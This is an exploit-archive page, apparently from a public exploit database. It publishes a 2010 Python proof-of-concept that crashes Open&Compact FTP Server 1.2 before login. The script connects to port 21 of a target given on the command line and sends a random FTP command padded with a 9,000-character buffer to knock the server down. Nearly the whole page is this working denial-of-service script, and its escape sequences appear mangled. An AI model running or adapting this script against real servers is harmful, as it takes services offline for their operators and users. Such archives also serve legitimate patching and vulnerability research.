Open&Compact Ftp Server 1.2 Universal Pre-Auth Denial of Service

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Open&Compact Ftp Server 1.2 Universal Pre-Auth Denial of Service
# Published : 2010-05-25
# Author : Dr_IDE
# Previous Title : Adobe Photoshop CS4 Extended 11.0 ASL File Handling Remote BoF PoC
# Next Title : ISC-DHCPD Denial of Service

#!/usr/bin/python
###################################################################
#
# Open&Compact Ftp Server 1.2 Universal Pre-Auth Denial of Service
# Coded By: Dr_IDE
# Found By: Ma3sTr0-Dz
# Date:     May 24, 2010
# Download: http://sourceforge.net/projects/open-ftpd/
# Tested:   Windows 7
#
###################################################################

import random, socket, sys

host = (sys.argv[1])
buff = ("A: " * 3000)
cmds = ['ABOR', 'APPE', 'ALLO', 'PORT', 'USER', 'PASS', 'PASV', 'MKD', 'SIZE']

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print ("rn[i] Connecting to: " + host +"rn")
s.connect((host, 21))
d=s.recv(1024)
print (d)
magic=random.choice(cmds)
print ("[*] Finding vulnerable commands.rn")
print ("[*] Performing some kind of complex calculations...rn")
print ("[*] Crashing server with command: " + magic + "rn")
s.send(magic + " " + buff + 'rn')
print ("[i] Server Down")
s.close()
         
# End